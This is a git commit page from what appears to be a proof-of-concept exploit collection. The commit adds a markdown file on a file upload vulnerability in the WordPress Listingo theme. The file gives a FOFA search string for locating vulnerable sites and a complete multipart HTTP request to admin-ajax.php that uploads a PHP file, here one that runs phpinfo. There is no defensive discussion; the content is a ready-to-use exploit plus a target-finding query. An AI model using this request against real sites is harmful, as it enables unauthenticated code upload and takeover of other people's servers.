admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create wordpress listingo 文件上传漏洞.md

Browse Source
This commit is contained in:
wy876 2023-12-28 19:58:25 +08:00 committed by GitHub
parent 15621e4f11
commit 58d044acf8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

27
wordpress listingo 文件上传漏洞.md Normal file
View File

@ -0,0 +1,27 @@
## wordpress listingo 文件上传漏洞
## fofa
```
body="wp-content/themes/listingo"
```
## poc
```
POST /wp-admin/admin-ajax.php?action=listingo_temp_uploader HTTP/1.1
Host: targetUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8rVjnfcgxgKoytcgAccept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 531
------WebKitFormBoundary8rVjnfcgxgKoytcg
Content-Disposition: form-data; name="listingo_uploader";filename="1008.php"
Content-Type:text/php
<?phpphpinfo();?>
------WebKitFormBoundary8rVjnfcgxgKoytcg
Content-Disposition: form-data; name="submit"
Start Uploader
------WebKitFormBoundary8rVjnfcgxgKoytcg--
```
![image](https://github.com/wy876/POC/assets/139549762/8b115456-bcbe-4d0f-b51d-add3dcf0db78)